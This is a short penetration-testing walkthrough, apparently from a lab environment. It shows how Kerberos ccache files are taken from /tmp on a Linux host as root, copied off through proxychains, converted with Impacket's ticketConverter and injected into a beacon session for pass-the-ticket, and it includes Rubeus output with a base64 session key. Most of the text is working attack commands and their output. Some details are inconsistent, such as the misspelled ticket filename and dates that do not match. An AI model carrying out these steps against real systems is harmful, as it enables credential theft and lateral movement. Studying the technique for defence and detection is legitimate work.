Linux Credential cache

When a user authenticate using kerberos on a Linux server, it will generate a Kerberos Credential Cache (ccache) file in the /tmp/ folder.

Only the user who authenticated and root can read the ccache file, which looks like this

root@nix-1:/tmp# ls -l
total 32
-rw------- 1 s.owen     domain users 1317 Jan 28 03:49 krb5cc_613401139_FGCP0F
-rw------- 1 j.byrd     domain users 1325 Jan 28 04:00 krb5cc_613401602_Ceh18d
-rw------- 1 a.mitchell domain users 1369 Jan 28 09:40 krb5cc_613405103_t7Yx4t
drwx------ 3 root       root         4096 Jan 26 09:19 snap.lxd
drwx------ 3 root       root         4096 Jan 26 09:19 systemd-private-3d7bca7820d8464ab8d715d6360b952e-systemd-logind.service-YKskJf
drwx------ 3 root       root         4096 Jan 26 09:18 systemd-private-3d7bca7820d8464ab8d715d6360b952e-systemd-resolved.service-2n44tj
drwx------ 3 root       root         4096 Jan 26 09:18 systemd-private-3d7bca7820d8464ab8d715d6360b952e-systemd-timesyncd.service-P9m86f
drwx------ 2 root       root         4096 Jan 26 09:18 vmware-root_705-4256479617

Using root we can copy the file back to our computer

proxychains scp [email protected]:/tmp/krb5cc_613405103_t7Yx4t .
ProxyChains-3.1 (<http://proxychains.sf.net>)
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.120.45:22-<><>-OK

and we would need to covert the file to kirbi in order to inject it into our session.

We will do it by using Impacket TicketConverter.py

python3 impacket/examples/ticketConverter.py krb5cc_613405103_t7Yx4t amitchell.kirbi
Impacket v0.9.23.dev1+20210127.141011.3673c588 - Copyright 2020 SecureAuth Corporation

[*] converting ccache to kirbi...
[+] done

$ ls
amitchell.kirbi  krb5cc_613405103_t7Yx4t

And then we can inject the TGT into our session and use that user privileges:

beacon> kerberos_ticket_use amitchall.kirbi
[*] Tasked beacon to apply ticket in kerberos_ticket_use amitchall.kirbi
[+] host called home, sent: 2985 bytes

We can also use Rubeus to check the ticket

beacon> Rubeus.exe describe /ticket:amitchall.kirbi

[*] Action: Describe Ticket

  ServiceName           :  krbtgt/EH.LAB
  ServiceRealm          :  EH.LAB
  UserName              :  a.mitchell
  UserRealm             :  CYBERBOTIC.IO
  StartTime             :  14/01/2021 02:28:00
  EndTime               :  14/01/2021 12:28:00
  RenewTill             :  15/01/2021 02:28:00
  Flags                 :  name_canonicalize, pre_authent, initial, renewable
  KeyType               :  aes256_cts_hmac_sha1
  Base64(key)           :  R+IBQszWvClmOofy8FcnELvZQ2nFinpnX19Xs5KE7i0=